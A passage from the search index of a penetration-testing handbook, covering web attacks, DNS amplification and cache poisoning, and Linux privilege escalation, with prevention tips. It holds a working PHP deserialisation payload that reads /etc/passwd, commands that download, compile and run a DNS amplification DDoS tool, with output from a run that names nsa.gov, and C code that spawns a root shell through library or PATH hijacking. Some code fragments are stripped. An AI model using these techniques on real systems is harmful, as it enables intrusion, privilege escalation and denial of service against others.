Redirect","id":"114","title":"Meta Refresh Tag Redirect"},"115":{"body":"Open redirects can be exploited by modifying the window's location property through the Document Object Model. This property denotes where a request should be redirected to. An attacker may change the location property through any of the following ways: window.location = https://www.google.com/ window.location.href = https://www.google.com window.location.replace(https://www.google.com) This type of open redirect is usually chained with some sort of XSS.","breadcrumbs":"Exploitation » Web » Open Redirect » Javascript Redirect","id":"115","title":"Javascript Redirect"},"116":{"body":"PHP Object Injection is a type of an insecure deserialisation attack which can result in arbitrary code execution.","breadcrumbs":"Exploitation » Web » PHP Object Injection » Introduction","id":"116","title":"Introduction"},"117":{"body":"PHP Magic Methods are a set of reserved methods for PHP objects which can be defined and which are automatically invoked in certain situations. Whilst it is possible to achieve code execution entirely by using normal methods on objects, magic methods can make the process easier.","breadcrumbs":"Exploitation » Web » PHP Object Injection » Magic Methods","id":"117","title":"Magic Methods"},"118":{"body":"PHP has functionally which allows arbitrary objects to be turned into strings and then later retrieved as objects from those same strings. This is achieved through the serialize() and unserialize() functions. When an adversary has control over the object which gets deserialised, they can manipulate the input in such a way to make the PHP script perform arbitrary actions. name = \"cr0mll\";\n$user->isAdmin = False; echo serialize($user);\n?> The serialisation string follows the type:data paradigm and has the following structure: Type Format Boolean b:value Integer i:value Float d:value String s:length:\"value\" Array a:size:{values} Object O:name_length:\"Class_name\":number_of_properties:{properties}","breadcrumbs":"Exploitation » Web » PHP Object Injection » Serialisation","id":"118","title":"Serialisation"},"119":{"body":"Deserialisation is the inverse operation - the unserialize() function takes a string and converts it to a PHP object (or normal variable). When the string passed to unserialize() is user-controlled, an adversary can craft a custom string which will result in an object with values of the attacker's choice. When these values are later used by the PHP application, they can alter its behaviour. Take a look at the following example: filename); }\n} class User\n{ public $name; public $isAdmin;\n} $user = unserialize($_POST['user']); if $user->isAdmin\n{ echo $user->name . \" is an admin.\\n\"\n}\nelse\n{ echo $user->name . \" is not an admin.\\n\"\n}\n?> In order to achieve arbitrary code execution, object injection relies on PHP Gadgets - pieces of code (typically classes) that the PHP script has access to. Usually, PHP code runs in some sort of a framework - when this is true, it is rather easy to find gadgets. Here, however, we do not have that luxury. The User class is only a storage container - it has no functionality. On the other hand, the LoadFile class can do some stuff. It has the __tostring magic method defined and it returns the contents of the file with the provided filename. We can manipulate the user object. Therefore, it is possible to set its name to an object - namely a LoadFile object with the file name set to anything we like. When the server receives this malicious user with an embedded LoadFile object, it is going to attempt to turn it into a string when echo is called. The embedded LoadFile object has its filename set to /etc/passwd for example, and so file_get_contents() is going to read this file, return its contents as a string and echo will print them out for us. Here is the exploit code: filename); }\n} class User\n{ public $name; public $isAdmin;\n} $obj = new LoadFile();\n$obj->filename = \"/etc/passwd\"; $user = new User();\n$user->name = $obj;\n$user->isAdmin = true; echo serialize($user);\n?> When we run this, we get the following serialisation string for the malicious user: O:4:\"User\":2:{s:4:\"name\";O:8:\"LoadFile\":1:{s:8:\"filename\";s:11:\"/etc/passwd\";}s:7:\"isAdmin\";b:1;} If we send it in a post request to the server, it will retrieve /etc/passwd for us:","breadcrumbs":"Exploitation » Web » PHP Object Injection » Deserialisation","id":"119","title":"Deserialisation"},"12":{"body":"Network scanning is the process of gathering information about a target via comlex reconnaissance techniques. The term \"network scanning\" refers to the procedures used for discovering hosts, ports, running services and information about the underlying OS type.","breadcrumbs":"Reconnaissance » Enumeration » Overview","id":"12","title":"Overview"},"120":{"body":"Never allow direct user control over the data passed to unserialize().","breadcrumbs":"Exploitation » Web » PHP Object Injection » Prevention","id":"120","title":"Prevention"},"121":{"body":"PHAR is the PHP Archive format and can allow for object injection even when there is no direct unserialize() call - provided that there is a way to upload a file to the server. Phar archives require neither a specific extension nor a set of magic bytes for identification which makes them especially useful for bypassing file upload filters. The format of the archive is the following: Stub - must contain Manifest Metadata - contains the serialised data Contents - the archive contents Signature - for integrity verification You would be quick to think that you can just inject code into the stub and it will be executed, but that is not the case. Where the stub really shines is the fact that it can contain anything before the part. This means that the stub can be used to imitate other file formats. Under the hood, PHAR stores metadata in a PHP-serialised format which needs to be deserialised when PHP uses the archive. In order for this to happen, the server needs to access the archive using the phar:// stream wrapper. It is for this reason that a way of uploading files to it is necessary.","breadcrumbs":"Exploitation » Web » PHP Object Injection » PHAR Files","id":"121","title":"PHAR Files"},"122":{"body":"If you try generating a phar file using PHP, you will likely run into the following error: In this case, you will need to set phar.readonly = Off in your /etc/php//cli/php.ini file (this is not required on the server, only on your machine). Afterwards, you can use the following code to generate the phar file: startBuffering(); $prefix = ...; # The data used for imitating another file format\n$phar->setStub($prefix . \"\"); $payload = ...; # Object injection payload\n$phar->setMetadata(serialize($payload)); $phar->addFromString(\"test.txt\", \"test\"); # Optional\n$phar->stopBuffering();\n?> The extension of the file can then be changed to anything. Subsequently, the file will need to be uploaded to the server. Once it is there, a way to make the server perform a file operation with phar:// is required. Additionally, there are a few caveats which need to be taken into account. The payload inside the object injection chain may only use the __wakeup() and __destruct() magic methods. Moreover, any file paths inside it must be absolute because phar files deal with context in a weird way when they are loaded.","breadcrumbs":"Exploitation » Web » PHP Object Injection » Generating the Payload","id":"122","title":"Generating the Payload"},"123":{"body":"The only way to completely prevent phar file abusing is to disable the phar:// stream wrapper altogether: stream_wrapper_unregister('phar');","breadcrumbs":"Exploitation » Web » PHP Object Injection » Prevention","id":"123","title":"Prevention"},"124":{"body":"HTTP Response Splitting occurs when user-provided input isn't sanitised and CRLFs are injected into HTTP responses. This is usually done through URL parameters. This type of attack typically requires social engineering or at least some user interaction. HTTP responses consist of message headers and a message body. The headers are separated from the body with 2 CRLFs - \\r\\n\\r\\n. An attacker could inject this character sequence into a header and terminate the header section - this could result in XSS, since anything after the 2 CRLFs will be treated as HTML. Imagine a custom header X-Name: Bob which is set via a parameter in a GET request called name. If input isn't properly sanitised, an attacker could craft the following URL which would result in XSS: ?name=Bob%0d%0a%0d%0a In other cases, HTTP response splitting may be used to send two responses to a single request by injecting the second response into the first one. A URL like the following could change the contents of a legitimate page that the target visits: application.com/redir.php?lang=hax%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%d%aContent-Length:%2019%0d%0aHacked All the target needs to do, is visit the URL.","breadcrumbs":"Exploitation » Web » HTTP Response Splitting » Introduction","id":"124","title":"Introduction"},"125":{"body":"Certain vulnerabilities allow the attacker to input encoded characters that possess special meanings in HTML and HTTP responses. Usually, such input is sanitised by the application, however, sometimes application developers simply forget to implement sanitisation or don't do it properly. Carriage Return (CR - \\r) and Line Feed (LF - \\n) can be represented with the following encodings, respectively - %0D and %0A. CRLF injection occurs when a user manages to submit a CRLF (a new line) into an application. These vulnerabilities might be pretty minor, but might also be rather critical. The most common CRLF injections include injecting content into files on the server-side such as log files. Through cleverly crafted messages, an attacker could add fake error entries to a log and therefore make a system admin spend time looking for an issue that doesn't exist. This isn't really powerful in itself and is rather akin to pure trolling. Sometimes, however, CRLF may lead to HTTP Response Splitting .","breadcrumbs":"Exploitation » Web » CRLF Injection » Overview","id":"125","title":"Overview"},"126":{"body":"Cross-site scripting (XSS) describes a set of attacks where an adversary injects Javascript into a web application, typically because user input isn't properly sanitised. It is similar to HTML injection, however, it allows for the execution of Javascript code and that makes it a potentially critical vulnerability. There are 3 main types of XSS and the difference between them lies in the way the injected code reaches the end user.","breadcrumbs":"Exploitation » Web » Cross-Site Scripting (XSS) » Overview","id":"126","title":"Overview"},"127":{"body":"This is the most severe type of XSS. The injected Javascript is sent to the server and the server stores it, for example in a database. When another user goes to retrieve the page that the attacker injected into, the JavaScript is also sent to the user as part of that page and is executed by their browser. For example, if you can inject into the username field of a user sign-up form, then any other users who visit your user profile later will be prompted with an alert box saying \"XSS\".","breadcrumbs":"Exploitation » Web » Cross-Site Scripting (XSS) » Stored XSS","id":"127","title":"Stored XSS"},"128":{"body":"Blind XSS is a subset of stored XSS attacks where the injected script is stored by the server in a different part of the application which you don't have direct access and thus can't directly see if your XSS attempt was successful. For example, if the application allows you to send a message to the support team and you can inject into it, the XSS will be executed once the admin panel is visited by a member of the support staff.","breadcrumbs":"Exploitation » Web » Cross-Site Scripting (XSS) » Blind XSS","id":"128","title":"Blind XSS"},"129":{"body":"Reflected XSS occurs when a server receives data which it then includes in its reply to the submitted request. This is typically exploited by creating a malicious link containing a script inside it and then tricking a user into clicking visiting that URL. Suppose there is a search bar somewhere in the application, the contents of which are sent as a URL parameter in a GET request when a user clicks the search button and are then displayed on the response page in a similar manner: Search results for: The request could be to the following example URL: example.com/?search=val If your application is vulnerable to XSS, the attacker could craft a malicious URL like the following one: example.com/?search= This would inject the Javascript as HTML into the on the response page and the browser would then execute the code.","breadcrumbs":"Exploitation » Web » Cross-Site Scripting (XSS) » Reflected XSS","id":"129","title":"Reflected XSS"},"13":{"body":"","breadcrumbs":"Reconnaissance » Enumeration » Types of scanning","id":"13","title":"Types of scanning"},"130":{"body":"DOM-based XSS is a type of XSS where the malicious code is never sent to the server. This commonly occurs when using the fragment part of a URL, or by referencing document.URL / document.location.href. This a less common attack nowadays, since most browser automatically escape Javascript in address bars, so DOM-based XSS will only work if you unescape it. Suppose you have a page on http://127.0.0.1:8080/example.html You can add fragments to the URL with a # symbol. http://127.0.0.1:8080/example.html#test=val The fragment part (#test=val) is never sent to the server - it is only available locally. Suppose you had the following client-side Javascript code running: const pos = document.URL.indexOf(\"test=\") + 5;\nconst value = document.URL.substring(document.URL.indexOf(\"test=\") + 5, document.URL.length); document.write(value); An attacker could craft the following URL: http://127.0.0.1:8080/example.html#test= However, if a victim clicks on this link, no Javascript should be injected, since the browser would usually automatically escape it - you would get %3Cscript%3Ealert('xss')%3C/script%3E printed on the page. If, however, the Javascript is decoded the client-side code, it will get executed.","breadcrumbs":"Exploitation » Web » Cross-Site Scripting (XSS) » DOM-based XSS","id":"130","title":"DOM-based XSS"},"131":{"body":"You should try different XSS payloads within every user input field you might find. It is useful to use BurpSuite for that because you might be able to inject into more obscure fiels such as drop-down menus by using a proxy. You should also be aware that not only can you use the . When injected, the page's source code would look like this .","breadcrumbs":"Exploitation » Web » Cross-Site Scripting (XSS) » Hunting for XSS","id":"131","title":"Hunting for XSS"},"132":{"body":"Cross-Site Request Forgery (CSRF) is a type of attack used to trick the victim into sending a malicious request. It utilises the identity and privileges of the target in order to perform an undesired action on the victim's behalf. It is similar to indirect impersonation - you can make the victim's browser submit requests as the victim. It is called \"cross-site\" because a malicious website can make the victim's browser send a request to another website. This attack typically relies on the victim being authenticated - either through cookies or basic header authorization.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » Overview","id":"132","title":"Overview"},"133":{"body":"There are two primary types of CSRF - through GET requests and through POST requests (although methods like PUT and DELETE may also be exploitable). When your browser submits a request to a web server, it also sends along all stored cookies. If CSRF occurs, any authentication cookies will be sent with the request and as such, any actions on the server would be performed on the victim's behalf. Note that in order for CSRF to work, the victim needs to be logged in because when you make a log out request, the web server usually returns an HTTP response which auto-expires your authentication cookies and they are no longer valid. In order for it to work, the victim would need to visit your malicious website.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » How does it work","id":"133","title":"How does it work"},"134":{"body":"This typically relies on hidden images through the HTML tag. This tag takes an src attribute which will tell the victim's browser to perform a GET request to the specified URL in order to retrieve an image. However, an attacker can change this URL and even add parameters to it, so that the browser performs a GET request to any arbitrary site. An example of such a malicious hidden image could be this: When visiting your malicious site, this will make the victim's browser submit a GET request. Any cookies stored for bank.com would be sent along, including any authentication ones. As such, the bank would complete the transfer from the victim's account.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » The GET scenario","id":"134","title":"The GET scenario"},"135":{"body":"If the bank uses POST requests for transfers, the method won't work because image tags can't initiate POST requests. This can however be achieved through hidden forms.
    Normally, the submition of the form will require that a user clicks the submit button, but this can be automated through Javascript. The response from the submission of the POST request would be redirect to the non-displayed iframe and so the victim would never see what has happened.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » The POST scenario","id":"135","title":"The POST scenario"},"136":{"body":"","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » Preventions","id":"136","title":"Preventions"},"137":{"body":"Sometimes, websites will make use of two-part tokens called CSRF tokens in order to prevent cross-site request forgery. These tokens are generated on the server - one part is sent to the user and the other is kept private. This value is submitted with the request and validated on the server. If the CSRF token isn't correct, the server shouldn't fulfill the submission. These tokens may be part of the POST request's body or as custom HTTP headers. They may take on any name, but some common ones include CSRF, CSRFToken, X-CSRF-TOKEN, form-id, lt, lia-token, etc. You should always try removing or altering the CSRF token in order to check if it's properly implemented.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » CSRF Tokens","id":"137","title":"CSRF Tokens"},"138":{"body":"When a browser sends an application/json POST request to a site, it will send an OPTIONS request beforehand. The site then returns a response indicating which types of HTTP requests the server accepts and from what trusted origins. Such OPTIONS requests are called preflight OPTIONS requests. CORS, or Cross-Origin Resource Sharing, restricts resource access, including JSON response access, from domains outside the one which served a file is allowed by the site being tested. When CORS is used, submitting application/json requests are not possible, unless the website explicitly allows them. These protections can sometimes be bypassed by changing the content-type header to application/x- www-form-urlencoded, multipart/form-data, or text/plain. Browsers don't send preflight OPTIONS requests for any of these content types and CSRF requests might succeed.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » CORS","id":"138","title":"CORS"},"139":{"body":"Checking the Origin and Referer headers (if the origin header isn't present) prevents CSRF because these headers are controlled by the browsers and cannot be altered by the attacker","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » Origin and Referer Headers","id":"139","title":"Origin and Referer Headers"},"14":{"body":"Lists the open ports and the services running on them. Port scanning describes the process of querying the running services on a computer by sending a stream of messages in an attempt to identify the service in question, as well as any information related to it. It involves probing TCP and UDP ports of a target system in order to determine if a service is running / listening.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning","id":"14","title":"Port Scanning"},"140":{"body":"This attribute can take on the values strict or lax. When set to strict, the browser won't send that specific cookie with any request that doesn't originate from the correct website - including GET requests. Setting the attribute to lax will prevent the cookie from being sent on normal subrequests (such as loading images or frames), however, the cookie will still be sent with direct requests to the origin site (such as those initiated by clicking on a link).","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » samesite Cookie Attribute","id":"140","title":"samesite Cookie Attribute"},"141":{"body":"","breadcrumbs":"Exploitation » Web » WebSockets","id":"141","title":"Exploitation"},"142":{"body":"HTTP Parameter Pollution describes the set of techniques used for manipulating how a server handles parameters in an HTTP request. This vulnerability may occur when duplicating or additional parameters are injected into an HTTP request and the website trusts them. Usually, HPP (HTTP Parameter Pollution) vulnerabilities depend on the way the server-side code handles parameters.","breadcrumbs":"Exploitation » Web » HTTP Parameter Pollution » Overview","id":"142","title":"Overview"},"143":{"body":"You send the server unexpected data, trying to make the server give an unexpected response. A simple example could be a bank transfer. Suppose, your bank performs transfers on its website through the use of HTTP parameters. These could be a recipient= parameter for the receiving party, an amount= parameter for the amount to send in a specific currency, and a sender= parameter for the one who sends the money. A URL for such a transfer could look like the following: https://www.bank.com/transfer?sender=abcdef&amount=1000&recipient=ghijkl It may be possible that the bank server assumes it will only ever receive a single sender= parameter, however, submitting two such parameters (like in the following URL), may result in unexpected behaviour: https://www.bank.com/transfer?sender=abcdef&amount=1000&recipient=ghijkl&sender=ABCDEF An attacker could send such a request in hopes that the server will perform any validations with the first parameter and actually transfer the money from the second account specified. When different web servers see duplicate parameters, they handle them in different ways . Even if a parameter isn't sent through the URL, inserting additional parameters may still cause unexpected server behaviour. This is especially the case with server code which handles parameters in arrays or vectors through indices. Inserting additional parameters at different places in the URL may cause reordering of the array values and lead to unexpected behaviour. An example could be the following: https://www.bank.com/transfer?amount=1000&recipient=ghijkl The server would deduce the sender on the server-side instead of retrieving it from an HTTP request. Normally, you wouldn't have access to the server code, but for a POC I have written a simple server in a pseudo-code (no particular language). sender.id = abcdef function init_transfer(params)\n{ params.push(sender.id) // the sender.id should be inserted at params[2] prepare_transfer(params)\n} function prepare_transfer(params)\n{ amount = params[0] recipient = params[1] sender = params[2] transfer(amount, recipient, sender)\n} Two functions are created here, init_transfer and prepare_transfer which takes a params vector. This function also later invokes a transfer function, the contents of which are currently out of scope. Following the above URL, the amount parameter be 1000, the recipient would be ghijkl. The init_transfer function adds the sender.id to the parameter array. Note, that the program expects the sender ID to be the 3rd (2nd index) parameter in the array in order to function properly. Finally, the transfer params array should look like this: [1000, ghijkl, abcdef]. Now, an attacker could make a request to the following URL: https://www.bank.com/transfer?amount=1000&recipient=ghijkl&sender=ABCDEF In this case, sender= would be included into the parameter vector in its initial state (before the init_transfer function is invoked). This means that the params array would look like this: [1000, ghijkl, ABCDEF]. When init_transfer is called, the sender.id variable would be appended to the vector and so it would look like this: [1000, ghijkl, ABCDEF, abcdef]. Unfortunately, the server still expects that the correct sender would be located at params[2], but that is no longer the case since we managed to insert another sender. As such, the money would be withdrawn from ABCDEF and not abcdef.","breadcrumbs":"Exploitation » Web » HTTP Parameter Pollution » Server-Side HPP","id":"143","title":"Server-Side HPP"},"144":{"body":"These vulnerabilities allow the attacker to inject extra parameters in order to alter the client-side. An example of this is included in the following presentation: https://owasp.org/www-pdf-archive/AppsecEU09_CarettoniDiPaola_v0.8.pdf. The example URL is http://host/page.php?par=123%26action=edit The example server code is the following: .'\">View Me! Here, a new URL is generated based on the value of a parameter $val. Here, the attacker passes the value 123%26action=edit onto the parameter. The URL-encoded value for & is %26. When this gets to the htmlspecialchars function, the %26 gets converted to an &. When the URL gets formed, it becomes And since this is view as HTML, an additional parameter has been smuggled! The link would be equivalent to /page.php? action=view&par=123&action=edit This second action parameter could cause unexpected behaviour based on how the server handles duplicate requests.","breadcrumbs":"Exploitation » Web » HTTP Parameter Pollution » Client-Side HPP","id":"144","title":"Client-Side HPP"},"145":{"body":"The HTTP Host header is a mandatory header for HTTP requests and specifies the domain name which the client wants to access. This is especially handy with virtual hosting because a single IP address may provide different services on different domains and the server needs to know which page to return to the client. For example, the same machine may serve a blog website at blog.example.com and a git repository at dev.example.com. In order to specify which of the two services the client wants to access, they must specify either the header Host: blog.example.com or dev.example.com, respectively, in their request. A host header injection vulnerability arises when the target application unsafely uses the contents of the Host header, typically in order to construct an absolute URL.","breadcrumbs":"Exploitation » Web » Host Header Injection » Introduction","id":"145","title":"Introduction"},"146":{"body":"This technique involves using Host Header Injection in order to force a vulnerable application to generate a password reset link which points to a malicious domain. This may be leveraged to steal the secret tokens required to reset the passwords of arbitrary users and consequently compromise their accounts. Typically applications implement password resetting as follows. The user specifies their username/email. The server generates a temporary, unique, high-entropy token for the user. The server generates a URL for the password reset with the secret token included as a URL parameter. For example, example.com/reset?token=abcdefghijklmnopqrstuvwxyz The server sends an email to the client which includes the generated password reset link. When the user clicks the link in their email, the token in the URL is used by server in order to determine whose password is being reset and whether or not it is a valid request. If the Host header of the request for a password reset is used in generating the password reset URL, an adversary may leverage it in order to steal the token for an arbitrary user. For example, an adversary could submit a password reset request for a user, e.g. carlos, intercept the request and modify the Host header to point to a domain controlled by them: Host: exploit-server.com. When the server generates the password reset URL, it will resemble the following, http://exploit-server.com/reset?token=abcdefghijklmnopqrstuvwxyz. If the victim clicks on the link, their token will be handed over to the attacker by means of the exploit-server.com domain which receives the password reset request. This type of attack, however, does not always require user interaction because emails are typically scanned be it to determine if they are spam or if they contain a virus and the scanners will oftentimes open the links themselves, all automatically, thus giving the attacker the token to reset the password.","breadcrumbs":"Exploitation » Web » Host Header Injection » Password Reset Poisoning","id":"146","title":"Password Reset Poisoning"},"147":{"body":"Check to see if absolute URLs are necessary and cannot be replaced with relative ones. If an absolute URL is necessary, ensure that the current domain is stored in a configuration file and do NOT use the one from the Host: header. If using the Host header is inevitable, ensure that it is validated against a whitelist of permitted domains. Different frameworks may provide different methods for achieving this. Drop support for additional headers which may permit such attacks, such as the X-Forward-Host header. Do NOT virtual-host internal-only websites on a server which also provides public-facing content, since those may be accessed via manipulation of the Host header.","breadcrumbs":"Exploitation » Web » Host Header Injection » Prevention","id":"147","title":"Prevention"},"148":{"body":"","breadcrumbs":"Exploitation » Windows » Windows","id":"148","title":"Windows"},"149":{"body":"Shell Command Files (SCF) permit a limited set of operations and are executed upon browsing to the location where they are stored. What makes them interesting is the fact that they can communicate through SMB, which means that it is possible to extract NTLM hashes from Windows hosts. This can be achieved if you are provided with write access to an SMB share.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » Introduction","id":"149","title":"Introduction"},"15":{"body":"This is the process of discovering active hosts on a network, either for attacking them or assessing the overall network security.","breadcrumbs":"Reconnaissance » Enumeration » Network Scanning","id":"15","title":"Network Scanning"},"150":{"body":"You will first need to create a malicious .scf file where you are going to write a simple (you can scarcely even call it that) script.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » The Attack","id":"150","title":"The Attack"},"151":{"body":"","breadcrumbs":"Exploitation » DNS » DNS","id":"151","title":"DNS"},"152":{"body":"A DNS (Traffic) Amplificaton attack is a popular form of a distributed denial of service (DDoS) attack, which abuses open DNS resolvers to flood a target system with DNS response traffic. It's called an amplification attack because it uses DNS responses to upscale the size of the data sent to the victim.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » What is DNS Traffic Amplification?","id":"152","title":"What is DNS Traffic Amplification?"},"153":{"body":"An attacker sends a DNS name lookup to an open resolver with the source IP spoofed to be the victim's IP address. That way, any response traffic would be sent to the victim and not the attacker. The requests submitted by the attacker usually aim to query for as much information as possible in order to maximise the amplification effect. In most cases, the queries sent are of type ANY which requests all known information about a particular DNS zone. Using a botnet, it's easy to create immense amounts of traffic. It is also rather difficult to protect against these attacks because the traffic is coming from legitimate sources - real DNS servers.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » How does it work?","id":"153","title":"How does it work?"},"154":{"body":"","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Conducting a DNS Traffic Amplification Attack","id":"154","title":"Conducting a DNS Traffic Amplification Attack"},"155":{"body":"We should first check if a DNS Traffic Amplification is possible and if it's viable. We can do this through Metasploit using the module auxiliary/scanner/dns/dns_amp. In the RHOSTS you need to put the IP of the name server you want to test. This module will tell you if a name server can be used in an amplification attack but won't actually execute the attack. Run the scanner:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Testing a DNS server for attack surface","id":"155","title":"Testing a DNS server for attack surface"},"156":{"body":"A simple tool is available only as a proof of concept here . You will need to download and then compile it: wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c gcc -o dnsdrdos dnsdrdos.c -Wall -ansi ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\n--2021-09-21 13:01:11-- https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 15109 (15K) [text/plain]\nSaving to: ‘dnsdrdos.c’ dnsdrdos.c 100%[========================================================================================================================================>] 14.75K --.-KB/s in 0.001s 2021-09-21 13:01:11 (17.9 MB/s) - ‘dnsdrdos.c’ saved [15109/15109] ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ gcc -o dnsdrdos dnsdrdos.c -Wall -ansi Now, create a file containing the IP's of each DNS server you want to use in the attack (only one IP per line). Use the following syntax to run the attack: sudo ./dnsdrdos -f -s -d -l ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ sudo ./dnsdrdos -f dns_servers -s 192.168.129.2 -d nsa.gov -l 30\n----------------------------------------------- dnsdrdos - by noptrix - http://www.noptrix.net/ ----------------------------------------------- ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ The output may be empty, but the packets were sent. You can verify this with wireshark:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Executing the attack","id":"156","title":"Executing the attack"},"157":{"body":"A flaw of all DNS name servers is that if they contain incorrect information, they may spread it to clients or other name servers. Each DNS name server (even individual clients) has a DNS cache. The system stores there information about any responses it gets for domains it requested. An attacker could inject false entries in this cache and as such, any computer which queries the poisoned name server will receive false results. This is known as DNS cache poisoning . The attack can be used to redirect users to a different website than the requested one. As such, it opens opportunities for phishing attacks by creating evil twins of login portals for well-known sites. A tool for performing such targeted attacks is deserter . Usage information is available on its GitHub page.","breadcrumbs":"Exploitation » DNS » DNS Cache Poisoning » Introduction","id":"157","title":"Introduction"},"158":{"body":"","breadcrumbs":"Post Exploitation » Post Exploitation","id":"158","title":"Post Exploitation"},"159":{"body":"","breadcrumbs":"Post Exploitation » Privilege Escalation » Introduction","id":"159","title":"Introduction"},"16":{"body":"Reveals the presence of known vulnerabilities. It checks whether a system is exploitable through a set of weaknesses. Such a scanner consists of a catalog and a scanning engine. The catalog contains information about known vulnerabilities and exploits for them that work on a multitude of servers. The scanning engine is responsible for the logic behind the exploitation and analysis of the results.","breadcrumbs":"Reconnaissance » Enumeration » Vulnerability Scanning","id":"16","title":"Vulnerability Scanning"},"160":{"body":"The first thing you need to do after gaining a foothold on a machine is to look for reused credentials. You should try every password you have gathered on all users, you never know when you might find an easy escalation to root. Next, you should hunt down sensitive files and look for stored credentials in configuration and source files of different applications. Naturally, you should also enumerate any local databases you find. Additionally, SSH keys are something to be on the lookout for. You should also go through the bash history and look for any passwords which were passed as command-line arguments. You should then move on to looking for exploits. Kernel exploits are really low-hanging fruit, so you should always check the kernel version. Subsequently, proceed by enumerating sudo and the different ways to exploit it, for example via Shell Escape Sequences or LD_PRELOAD . Following, you should proceed by tracking down any misconfigurations such as excessive capabilities or SUID Binaries . You should check if you have write access to any sensitive files such as /etc/passwd or /etc/shadow, as well as any cron jobs or cron job dependencies. Ultimately, you should move on to enumerating running software and services which are executed as root and try to find vulnerabilities in them which may allow for privilege escalation. This can all be summed up into the following: Credentials Reused Credentials Credentials in Configuration or Source Files Credentials from Databases Credentials in Sensitive Files Credentials from Bash History SSH Keys Exploitation Kernel Exploits Sudo Misconfigurations Excessive Capabilities SUID/SGID Binaries Write Access to Sensitive Files Writable Cron Jobs and Cron Job Dependencies Installed Software Vulnerabilities in Software and Services Running as Root","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Methodology","id":"160","title":"Methodology"},"161":{"body":"The Set Owner User ID (SUID) and Set Group ID (SGID) are special permissions which can be attributed to Linux files and folders. Any files which are owned by root and have SUID set will be executed with elevated privileges. Our goal is to hunt down those files and abuse them in order to escalate our privileges. This can be easily done with the following command: find / -perm -u=s -type f -user root 2>/dev/null","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Introduction","id":"161","title":"Introduction"},"162":{"body":"You should diligently inspect the list of files returned. Some standard Linux binaries may allow for privilege escalation if they have the SUID bit set for one reason or another. It is useful to go through these binaries and check them on GTFOBins . In the above example, we find that /bin/systemctl has the SUID bit set and that it also has an entry in GTFOBins : By following the instructions, although with slight modifications, we can run commands with elevated privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Exploiting Misconfigured Common Binaries","id":"162","title":"Exploiting Misconfigured Common Binaries"},"163":{"body":"Some binaries may be vulnerable to Shared Object (SO) Injection. This typically stems from misconfigurations where the binary looks for a specific library in a specific directory, but can't actually find it. If we have write access to this directory, we can hijack the search for the library by compiling our own malicious library in the place where the original one was supposed to be. This is quite similar to escalating via LD_PRELOAD , but it is a bit more difficult to find and exploit. You will first need to identify an SUID binary which has misconfigured shared libraries. A lot of the times the binary will refuse to run, saying that it is missing a particular library, however, this is not always the case: It is always good practice to run the programme with strace, which will print any attempts of the binary to access libraries: strace 2>&1 | grep -iE \"open|access\" What stands out in particular is the /home/user/.config/libcalc.so library, since /home/user/.config/ may be a writable directory. It turns out that the directory doesn't even exist, however, we can write to /home/user/ which means that we can create it. What now remains is to compile a malicious library into libcalc.so. #include \n#include static void inject() __attribute__((constructor)); void inject()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} For older versions of GCC, you may need to use the _init() function syntax: #include \n#include void _init()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} Compile the malicious library: gcc -shared -fPIC -o libcalc.so libcalc.c # add -nostartfiles if using _init()","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Shared Object Injection","id":"163","title":"Privilege Escalation via Shared Object Injection"},"164":{"body":"Path Hijacking refers to the deliberate manipulation of environmental variables, most commonly \\$PATH, such that the invocations of programmes in a binary actually refer to malicious binaries and not the intended ones. This vector requires more sophisticated digging into the internals of an SUID binary, specifically tracking down the different invocations the binary performs. This can commonly be achieved by running strings on the binary, but you will probably have to resort to more serious reverse engineering, as well. Specifically, you want to be on the lookout for shell commands which get executed by the SUID binary.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Path Hijacking","id":"164","title":"Privilege Escalation via Path Hijacking"},"165":{"body":"Relative paths are comparably easy to hijack - they require little other than editing the \\$PATH variable. Once you have identified a shell command within an SUID binary which invokes another programme via a relative path, you can just prepend to the \\$PATH a directory which will contain an executable with the same name as the one originally invoked. Let's compile our own malicious binary. #include \n#include int main()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\"); return 0;\n} gcc -o /tmp/service /tmp/service.c Afterwards, we need to prepend /tmp to the \\$PATH variable: export PATH=/tmp:\\$PATH And finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Relative Paths","id":"165","title":"Hijacking Relative Paths"},"166":{"body":"Absolute paths 